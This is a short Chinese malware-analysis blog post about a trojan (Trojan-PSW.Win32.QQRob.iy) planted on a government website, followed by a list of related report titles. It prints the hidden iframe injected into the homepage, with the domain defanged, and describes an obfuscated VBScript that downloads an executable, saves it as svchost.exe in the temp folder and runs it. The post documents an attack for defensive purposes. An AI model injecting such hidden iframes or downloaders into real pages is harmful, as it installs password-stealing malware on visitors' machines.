某政府网站被挂木马txet.exe/Trojan-PSW.Win32.QQRob.iy

简介: 某政府网站被挂木马txet.exe/Trojan-PSW.Win32.QQRob.iy

网站首页被加入代码:

/------
<iframe height=0 width=0 src="hxxp://www.g**ao**jun***888.com/4"></iframe>
------/

打开网页4 中包含Javascript代码,输出一段加入多余空格、使用escape()加密的VBScript脚本程序。

该VBScript脚本程序利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件txet.exe,保存为 %temp%/svchost.exe,然后调用自定义函数yunxingexe(m5,X skj9)。

自定义函数yunxingexe()创建Shell.Application 对象XsKje,利用 XsKje 的 ShellExecute 方法 来运行 %temp%/svchost.exe。

/------


相关文章
|
6月前
|
安全
某可人官方网站挂马Trojan-PSW.Win32.OnLineGames.sbg
某可人官方网站挂马Trojan-PSW.Win32.OnLineGames.sbg
|
6月前
|
数据安全/隐私保护
一个下载灰鸽子Backdoor.Win32.Hupigon.cge的网站
一个下载灰鸽子Backdoor.Win32.Hupigon.cge的网站
|
6月前
|
安全 数据安全/隐私保护
01-12/某县政府网被加入下载木马 Trojan.Win32.Pakes 的代码(第2版)
01-12/某县政府网被加入下载木马 Trojan.Win32.Pakes 的代码(第2版)
01-15/某师范学院网站被挂马 sinze.exe/Virus.Win32.Delf.an
01-15/某师范学院网站被挂马 sinze.exe/Virus.Win32.Delf.an
|
6月前
|
JavaScript 前端开发 数据安全/隐私保护
下载Trojan-PSW.Win32.QQPass.ra等恶意程序的政府网站
下载Trojan-PSW.Win32.QQPass.ra等恶意程序的政府网站
|
6月前
|
监控 安全 数据安全/隐私保护
遭遇Trojan-PSW.Win32.WOW,Trojan.PSW.Win32.OnlineGames,Trojan.MnLess.kks等1
遭遇Trojan-PSW.Win32.WOW,Trojan.PSW.Win32.OnlineGames,Trojan.MnLess.kks等1
某论坛被挂马 down.exe / Virus.Win32.AutoRun.z / Trojan.PWS.Maran.262
某论坛被挂马 down.exe / Virus.Win32.AutoRun.z / Trojan.PWS.Maran.262
|
6月前
|
安全 Windows
抓获Backdoor.Gpigeon.voo和Trojan.PSW.OnlineGames.xd等盗号木马
抓获Backdoor.Gpigeon.voo和Trojan.PSW.OnlineGames.xd等盗号木马
|
6月前
|
安全
遭遇RootKit.Win32.GameHack,Trojan.PSW.Win32.QQPass,Trojan-PSW.Win32.OnLineGames等1
遭遇RootKit.Win32.GameHack,Trojan.PSW.Win32.QQPass,Trojan-PSW.Win32.OnLineGames等1
|
6月前
|
安全
装了卡巴电脑更卡?原来是Trojan-PSW.Win32.QQPass等盗号木马群作梗1
装了卡巴电脑更卡?原来是Trojan-PSW.Win32.QQPass等盗号木马群作梗1

热门文章

最新文章

AI助理

你好,我是AI助理

可以解答问题、推荐解决方案等